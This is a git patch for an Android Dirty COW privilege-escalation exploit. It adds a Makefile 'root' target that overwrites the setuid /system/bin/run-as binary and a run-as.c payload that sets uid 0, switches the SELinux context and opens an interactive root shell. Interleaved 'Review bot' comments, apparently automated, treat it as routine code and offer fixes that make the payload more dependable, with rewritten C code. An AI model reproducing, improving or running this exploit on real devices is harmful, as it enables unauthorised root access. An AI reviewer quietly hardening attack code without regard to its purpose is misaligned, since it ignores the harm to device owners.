From cfd2ff4a9a9373f33c1c77efdaa80f2584599874 Mon Sep 17 00:00:00 2001
From: Tim
Date: Mon, 19 Dec 2016 03:26:53 +0800
Subject: [PATCH] setcon shell

---
 Android.mk | 12 +++++++++
 Makefile   |  7 +++++-
 dcow.c     | 13 ++++++++--
 dirtycow.c | 17 +++++++------
 run-as.c   | 71 ++++++++++++++++++++++++++++++++++++++++++++++++++++++
 5 files changed, 109 insertions(+), 11 deletions(-)
 create mode 100644 run-as.c

diff --git a/Android.mk b/Android.mk
index a33a38e..dd8eaf2 100644
--- a/Android.mk
+++ b/Android.mk
@@ -14,3 +14,15 @@ LOCAL_LDFLAGS += -fPIE -pie
 
 include $(BUILD_EXECUTABLE)
 
+include $(CLEAR_VARS)
+LOCAL_MODULE := run-as
+LOCAL_SRC_FILES := \
+	dirtycow.c \
+	run-as.c
+LOCAL_CFLAGS += -DDEBUG
+LOCAL_CFLAGS += -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LOCAL_LDFLAGS += -llog
+
+include $(BUILD_EXECUTABLE)
+
diff --git a/Makefile b/Makefile
index a309613..9e40a48 100644
--- a/Makefile
+++ b/Makefile
@@ -8,9 +8,9 @@ build:
 
 push: build
 	adb push libs/$(ARCH)/dirtycow /data/local/tmp/dcow
-	adb push test.sh /data/local/tmp/test.sh
 
 test: push
+	adb push test.sh /data/local/tmp/test.sh
 	adb shell 'chmod 777 /data/local/tmp/dcow'
 	adb shell 'chmod 777 /data/local/tmp/test.sh'
 	adb shell '/data/local/tmp/test.sh'
@@ -18,6 +18,11 @@ test: push
 	adb shell 'cat /data/local/tmp/test2'
 	adb shell 'cat /data/local/tmp/test2' | xxd
 
+root: push
+	adb push libs/$(ARCH)/run-as /data/local/tmp/run-as
+	adb shell '/data/local/tmp/dcow /data/local/tmp/run-as /system/bin/run-as'
+	adb shell /system/bin/run-as
+
 clean:
 	rm -rf libs
 	rm -rf obj
diff --git a/dcow.c b/dcow.c
index dc54f2c..8e9b535 100644
--- a/dcow.c
+++ b/dcow.c
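Review bot: `LOCAL_LDFLAGS += -llog` is the wrong variable for pulling in a system library under ndk-build; libraries go in `LOCAL_LDLIBS := -llog`, which is what the NDK documents and what keeps link order correct. The new `run-as` module is also built with `LOCAL_CFLAGS += -DDEBUG` unconditionally, so the payload's LOGV output (uid and SELinux context, tag `exploit`) is written to logcat on every run — presumably intended for development only. Gate it so a quiet build is possible, e.g. `LOCAL_CFLAGS += $(if $(DEBUG),-DDEBUG)`, and add a one-line comment above the module stating that DEBUG makes the root payload log to logcat.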
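Review bot: The new `root` target overwrites the setuid-root `/system/bin/run-as` with the payload and then simply invokes it; nothing in the target saves or restores the original, so after it runs every caller of `run-as` on the device gets the payload's behaviour for as long as the modified page survives (presumably in the page cache, until eviction or reboot, since dcow does not write the partition). At minimum save a copy before the overwrite, `adb shell 'cat /system/bin/run-as > /data/local/tmp/run-as.orig'`, and add a comment on the target saying the replacement is transient and device-wide. The pushed binary is deliberately not chmod'ed, unlike `dcow` in the `test` target — that is fine only because dcow opens it read-only; worth a comment so nobody "fixes" it.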
@@ -12,9 +12,18 @@
 #include
 #include
 
-extern int dcow(int argc, char *argv[]);
+#ifdef DEBUG
+#include
+#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
+#elif PRINT
+#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
+#else
+#define LOGV(...)
+#endif
 
-int main(int argc, char *argv[])
+extern int dcow(int argc, const char *argv[]);
+
+int main(int argc, const char *argv[])
 {
 	return dcow(argc, argv);
 }
\ No newline at end of file
diff --git a/dirtycow.c b/dirtycow.c
index 14aa679..ad14c39 100644
--- a/dirtycow.c
+++ b/dirtycow.c
@@ -28,7 +28,7 @@ struct mem_arg {
 	void *offset;
 	void *patch;
 	off_t patch_size;
-	char *fname;
+	const char *fname;
 	volatile int stop;
 	int success;
 };
@@ -130,16 +130,17 @@ static void exploit(struct mem_arg *mem_arg)
 	LOGV("[*] exploited %p=%lx", (void*)mem_arg->offset, *(unsigned long*)mem_arg->offset);
 }
 
-int dcow(int argc, char *argv[])
+int dcow(int argc, const char * argv[])
 {
 	if (argc < 2) {
-		LOGV("usage %s /default.prop /data/local/tmp/default.prop", argv[0]);
+		LOGV("usage %s /data/local/tmp/default.prop /default.prop", argv[0]);
 		return 0;
 	}
-	char * fromfile = argv[1];
-	char * tofile = argv[2];
-
+	const char * fromfile = argv[1];
+	const char * tofile = argv[2];
+	LOGV("dcow %s %s", fromfile, tofile);
+
 	struct mem_arg mem_arg;
 	struct stat st;
 	struct stat st2;
@@ -150,7 +151,7 @@ int dcow(int argc, char *argv[])
 		return -1;
 	}
 	if (fstat(f,&st) == -1) {
-		LOGV("could not open %s", tofile);
+		LOGV("could not stat %s", tofile);
 		return 1;
 	}
 
@@ -160,7 +161,7 @@ int dcow(int argc, char *argv[])
 		return 2;
 	}
 	if (fstat(f2,&st2) == -1) {
-		LOGV("could not open %s", fromfile);
+		LOGV("could not stat %s", fromfile);
 		return 3;
 	}
 
diff --git a/run-as.c b/run-as.c
new file mode 100644
index 0000000..cb59ab2
--- /dev/null
+++ b/run-as.c
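Review bot: The LOGV block added to dcow.c is never used in this file — `main` only forwards to `dcow` — and it is a verbatim copy of the one in run-as.c (and, presumably, of dirtycow.c's), so three copies will drift. Move it into one `log.h` included by all three translation units, and while doing so give it the `do { ... } while (0)` shape so `if (x) LOGV(...); else ...` parses as intended; the `#elif PRINT` branch is identical to the `DEBUG` one and collapses to `#if defined(DEBUG) || defined(PRINT)`. A short header comment, "LOGV: logs to logcat (tag "exploit") and stdout when DEBUG or PRINT is defined; no-op otherwise", would document the contract in one place.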
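Review bot: In the `dcow` hunk the guard `if (argc < 2)` still does not cover `argv[2]`, which the new `const char * tofile = argv[2];` reads, and the added `LOGV("dcow %s %s", fromfile, tofile)` then passes that NULL to `%s`; with one argument this crashes instead of printing usage, so it should be `if (argc < 3) {`. The swapped usage text now agrees with the `fromfile = argv[1]`, `tofile = argv[2]` assignment order, which is good. `dcow`'s body continues past the end of this hunk.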
@@ -0,0 +1,71 @@
+#include
+#include
+#include
+#include
+#include
+
+#include
+#include
+
+#ifdef DEBUG
+#include
+#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
+#elif PRINT
+#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "exploit", __VA_ARGS__); printf(__VA_ARGS__); printf("\n"); fflush(stdout); }
+#else
+#define LOGV(...)
+#endif
+
+//reduce binary size
+char __aeabi_unwind_cpp_pr0[0];
+
+typedef int getcon_t(char ** con);
+typedef int setcon_t(const char* con);
+
+extern int dcow(int argc, const char *argv[]);
+
+int main(int argc, const char **argv)
+{
+	LOGV("uid %s %d", argv[0], getuid());
+
+	if (setresgid(0, 0, 0) || setresuid(0, 0, 0)) {
+		LOGV("setresgid/setresuid failed");
+	}
+
+	LOGV("uid %d", getuid());
+
+	dlerror();
+#ifdef __aarch64__
+	void * selinux = dlopen("/system/lib64/libselinux.so", RTLD_LAZY);
+#else
+	void * selinux = dlopen("/system/lib/libselinux.so", RTLD_LAZY);
+#endif
+	if (selinux) {
+		void * getcon = dlsym(selinux, "getcon");
+		const char *error = dlerror();
+		if (error) {
+			LOGV("dlsym error %s", error);
+		} else {
+			getcon_t * getcon_p = (getcon_t*)getcon;
+			char * secontext;
+			int ret = (*getcon_p)(&secontext);
+			LOGV("%d %s", ret, secontext);
+			void * setcon = dlsym(selinux, "setcon");
+			const char *error = dlerror();
+			if (error) {
+				LOGV("dlsym setcon error %s", error);
+			} else {
+				setcon_t * setcon_p = (setcon_t*)setcon;
+				ret = (*setcon_p)("u:r:shell:s0");
+				ret = (*getcon_p)(&secontext);
+				LOGV("context %d %s", ret, secontext);
+			}
+		}
+		dlclose(selinux);
+	} else {
+		LOGV("no selinux?");
+	}
+
+	system("/system/bin/sh -i");
+
+}
\ No newline at end of file
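Review bot: `main` reaches `system("/system/bin/sh -i")` no matter what happened before it — a failed `setresgid`/`setresuid` only logs, a missing `libselinux` or `setcon` symbol only logs, and the `setcon` return value is overwritten by the following `getcon` call before anything looks at it — so the operator gets a shell with no indication that it is not uid 0 or not in `u:r:shell:s0`. Since landing in that uid and context is the whole purpose of the payload, those failures should be terminal and the final `getcon` should only print `secontext` when it succeeded (it is otherwise uninitialised, and the inner `error` also shadows the outer one). `system()` goes through `sh -c` and inherits the caller's environment; `execl("/system/bin/sh", "sh", "-i", (char *)NULL)` starts the interactive shell directly and lets a failure be reported. The `getcon`-allocated `secontext` is never released with `freecon`, which is harmless for a process about to exec but worth a comment.
```c
	if (setresgid(0, 0, 0) || setresuid(0, 0, 0)) {
		LOGV("setresgid/setresuid failed");
		return 1;	/* never hand out a shell that is not uid 0 */
	}
	/* … unchanged: dlopen(libselinux) / dlsym("getcon") … */
			char *secontext = NULL;
			int ret = (*getcon_p)(&secontext);
			LOGV("%d %s", ret, ret == 0 ? secontext : "(getcon failed)");
			void *setcon = dlsym(selinux, "setcon");
			const char *setcon_error = dlerror();
			if (setcon_error) {
				LOGV("dlsym setcon error %s", setcon_error);
				return 1;
			}
			setcon_t *setcon_p = (setcon_t *)setcon;
			if ((*setcon_p)("u:r:shell:s0") != 0) {
				LOGV("setcon u:r:shell:s0 failed");
				return 1;
			}
			ret = (*getcon_p)(&secontext);	/* secontext from getcon is leaked: process execs next */
			LOGV("context %d %s", ret, ret == 0 ? secontext : "(getcon failed)");
	/* … unchanged: dlclose, "no selinux?" branch … */
	execl("/system/bin/sh", "sh", "-i", (char *)NULL);
	LOGV("execl /system/bin/sh failed");
	return 1;
```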